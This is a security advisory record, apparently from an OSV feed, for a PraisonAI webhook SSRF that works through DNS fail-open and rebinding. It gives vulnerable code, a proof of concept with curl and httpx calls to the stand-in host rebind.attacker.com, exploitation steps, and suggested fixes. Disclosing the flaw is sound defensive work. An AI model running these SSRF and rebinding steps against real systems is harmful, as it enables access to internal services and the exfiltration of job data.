{"id":"CVE-2026-55537","aliases":["GHSA-rg5q-pp8p-f7jm","PYSEC-2026-3895"],"title":"PraisonAI: Webhook SSRF via DNS fail-open in `JobSubmitRequest.validate_webhook_url()` — bypass of CVE-2026-40114","summary":"PraisonAI: Webhook SSRF via DNS fail-open in `JobSubmitRequest.validate_webhook_url()` — bypass of CVE-2026-40114","severity":"high","cvss":7.1,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N","vendor":"praisonai","product":"praisonai","ecosystem":"pip","affected":["praisonai < 4.6.58"],"patched":["praisonai 4.6.58"],"published":"2026-08-25","updated":"2026-09-10","sourceUpdated":"2026-09-10T12:26:03.526009091Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-rg5q-pp8p-f7jm","references":[{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg5q-pp8p-f7jm"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/2f9677abb2ea68eab864ee8b6a828fd0141612e1"},{"url":"https://github.com/MervinPraison/PraisonAI"},{"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.6.58"},{"url":"https://pypi.org/project/praisonai"},{"url":"https://github.com/advisories/GHSA-rg5q-pp8p-f7jm"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55537"}],"tags":["osv","pip","nvd","ghsa"],"epss":0.00179,"epssPercentile":0.07737,"cwe":["CWE-367","CWE-705","CWE-918"],"ingestedAt":"2026-08-25T15:27:53.343Z","slug":"CVE-2026-55537","body":"## Overview\n\n### Summary\n\n`praisonai/jobs/models.py::JobSubmitRequest.validate_webhook_url()` validates webhook\nURLs by resolving the hostname and checking whether the IP is private. When DNS\nresolution fails (`socket.gaierror`), the validator **silently passes** the URL via\n`except socket.gaierror: pass`. Additionally, even when DNS succeeds at validation time,\nthe webhook is fired much later by `JobExecutor._send_webhook()`, which calls\n`httpx.AsyncClient().post(job.webhook_url)` — performing a **fresh, independent DNS\nlookup** at execution time. Together, these flaws create a TOCTOU SSRF window.\n\nAn attacker can:\n1. Submit a job with `webhook_url` pointing to a hostname that currently does not\n   resolve (NXDOMAIN) → validation passes (`gaierror` → `pass`)\n2. Update DNS to point that hostname to `127.0.0.1` or another private IP\n3. When the job completes, `_send_webhook()` resolves the hostname fresh → POST sent\n   to the internal IP\n\n### Details\n\n**Flaw 1 — Fail-open on DNS error (`jobs/models.py` lines 58-66):**\n\n```python\n@field_validator(\"webhook_url\")\n@classmethod\ndef validate_webhook_url(cls, v):\n    ...\n    try:\n        ip = socket.gethostbyname(hostname)\n        ip_obj = ipaddress.ip_address(ip)\n        if ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_link_local:\n            raise ValueError(\"Webhook URL resolves to private network address\")\n    except socket.gaierror:\n        pass    # <-- FAIL-OPEN: DNS failure allows the URL without restriction\n    return v\n```\n\nWhen `socket.gethostbyname(hostname)` raises `socket.gaierror` (NXDOMAIN, timeout,\nnetwork error during validation), execution flows to `pass` and the URL is accepted.\n\n**Flaw 2 — Fresh DNS at execution time (`jobs/executor.py` lines 376-406):**\n\n```python\nasync def _send_webhook(self, job: Job):\n    async with httpx.AsyncClient(timeout=30.0) as client:\n        response = await client.post(\n            job.webhook_url,      # <-- fresh DNS resolution here, not cached from validation\n            json=payload,\n            ...\n        )\n```\n\n`httpx.AsyncClient` creates a new connection per call. DNS is resolved at execution time,\ncompletely independent of the validation-time resolution. The gap between submission\nand execution can be minutes to hours (depending on job queue depth and timeout settings).\n\n**Combined TOCTOU window:**\n\n```\nT=0   Attacker submits: webhook_url = \"http://rebind.attacker.com/cb\"\n      Validation:  socket.gethostbyname(\"rebind.attacker.com\") → gaierror (NXDOMAIN)\n      Result:      except socket.gaierror: pass  → ACCEPTED\n\nT=5   Attacker updates DNS: rebind.attacker.com A → 127.0.0.1 (TTL=60)\n\nT=60  Job completes. _send_webhook() fires:\n      httpx.post(\"http://rebind.attacker.com/cb\")\n      DNS: rebind.attacker.com → 127.0.0.1\n      POST reaches 127.0.0.1 → SSRF\n```\n\n**Relation to CVE-2026-40114 / GHSA-8frj-8q3m-xhgm:** That CVE covered \"no URL\nvalidation at all\" on the webhook_url parameter, patched in v4.5.126 by adding\n`validate_webhook_url()` to `jobs/models.py`. This finding targets the **validation code\nitself** — the `except socket.gaierror: pass` fail-open introduced in that patch.\nCVE-2026-40114: no validation. This bypass: validation present but fail-open on DNS error.\n\n### PoC\n\n**Requirements:** A domain you control with configurable DNS TTL, access to the jobs API\n\n**Step 1 — Confirm fail-open behaviour (local code verification):**\n\n```python\nfrom praisonai.jobs.models import JobSubmitRequest\nfrom unittest.mock import patch\nimport socket\n\n# Simulate: hostname temporarily does not resolve\nwith patch(\"socket.gethostbyname\", side_effect=socket.gaierror(\"NXDOMAIN\")):\n    req = JobSubmitRequest(\n        prompt=\"hello\",\n        webhook_url=\"http://rebind.attacker.com/callback\"\n    )\n    # No exception raised — URL accepted despite NXDOMAIN\n    print(\"Webhook accepted:\", req.webhook_url)\n```\n\nExpected: `Webhook accepted: http://rebind.attacker.com/callback`\n\n**Step 2 — Confirm fresh DNS at execution time:**\n\n```python\n# From jobs/executor.py _send_webhook():\n# httpx.AsyncClient creates a new TCP connection (no DNS cache sharing with validator)\n# Standard httpx behaviour: each .post() resolves DNS independently\n\nimport httpx, asyncio\n\nasync def demo():\n    # httpx resolves DNS here, not using any cached result from validation\n    async with httpx.AsyncClient() as client:\n        # This call resolves \"rebind.attacker.com\" fresh at runtime\n        # If DNS changed since validation, it hits the new IP\n        try:\n            r = await client.post(\"http://rebind.attacker.com/callback\", json={})\n        except Exception as e:\n            print(f\"Connection: {e}\")\n\nasyncio.run(demo())\n```\n\n**Step 3 — Full attack scenario:**\n\n```bash\n# 1. Set up domain with short TTL, currently returning NXDOMAIN\n#    rebind.attacker.com  →  (no record, TTL=60)\n\n# 2. Submit job via API\ncurl -X POST http://praisonai-server:8000/jobs \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"prompt\": \"Calculate 2+2\",\n    \"webhook_url\": \"http://rebind.attacker.com/callback\"\n  }'\n# Response: {\"job_id\": \"job_abc123\", \"status\": \"queued\", ...}\n\n# 3. After 5 seconds (before job finishes), add DNS record:\n#    rebind.attacker.com  A  127.0.0.1  TTL=60\n\n# 4. Wait for job to complete (seconds to minutes).\n#    _send_webhook() fires and resolves rebind.attacker.com → 127.0.0.1\n#    POST request hits 127.0.0.1 (internal service)\n\n# If 127.0.0.1:80 is running a service, it receives:\n# POST /callback HTTP/1.1\n# Content-Type: application/json\n# {\"job_id\": \"job_abc123\", \"status\": \"succeeded\", \"result\": \"4\", ...}\n```\n\n**Immediate variant (no DNS timing required):**\n\nIf DNS resolution fails transiently (rate limit, network blip, temporary outage)\nduring validation, the webhook is accepted unconditionally even for a URL that would\nnormally resolve to a private IP. No attacker control over DNS timing is required —\nthe attacker simply retries submission during moments when their DNS server is unreachable\n(e.g., their DNS server is down, causing `gaierror`).\n\n### Impact\n\n**What kind of vulnerability:** Server-Side Request Forgery via TOCTOU DNS rebinding\nand validation fail-open.\n\n**Who is impacted:** Any deployment exposing the PraisonAI Jobs API (`POST /jobs`) to\nexternal or lower-trusted callers. This includes:\n\n- **Multi-tenant deployments** where workspace members submit jobs\n- **API integrations** (n8n, Zapier-style workflows) that provide `webhook_url` fields\n\n**Post-exploit capabilities:**\n- HTTP POST to any internal service with JSON payload (job result data)\n- If an internal service interprets the POST body as commands (Jenkins webhook,\n  Consul KV, etc.), this achieves code execution on internal infrastructure\n- Exfiltration of job results (which may include agent reasoning, data retrieved\n  during the task, discovered credentials) to an attacker-controlled endpoint\n```\n\n---\n\n## Remediation Suggestion (for maintainers)\n\n**Fix 1 — Change `gaierror` handler to fail-closed (`jobs/models.py` line 63):**\n\n```python\n# VULNERABLE\nexcept socket.gaierror:\n    pass\n\n# FIXED\nexcept socket.gaierror:\n    raise ValueError(\n        \"Webhook URL hostname could not be resolved. \"\n        \"Ensure the hostname is valid and publicly reachable.\"\n    )\n```\n\n**Fix 2 — Re-validate at execution time (`jobs/executor.py` before `_send_webhook`):**\n\n```python\nasync def _send_webhook(self, job: Job):\n    if not job.webhook_url:\n        return\n    # Re-validate to prevent DNS rebinding\n    try:\n        from urllib.parse import urlparse\n        import socket, ipaddress\n        hostname = urlparse(job.webhook_url).hostname\n        ip = socket.gethostbyname(hostname)\n        if ipaddress.ip_address(ip).is_private:\n            logger.warning(f\"Webhook SSRF blocked at execution time: {job.webhook_url}\")\n            return\n    except Exception as e:\n        logger.warning(f\"Webhook validation failed at execution: {e}\")\n        return\n    # ... proceed with httpx.post\n```\n\n## Affected packages\n\n- `praisonai < 4.6.58`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `praisonai 4.6.58`","depth":"twilight","depthScore":39,"depthScoreParts":{"impact":39.1,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}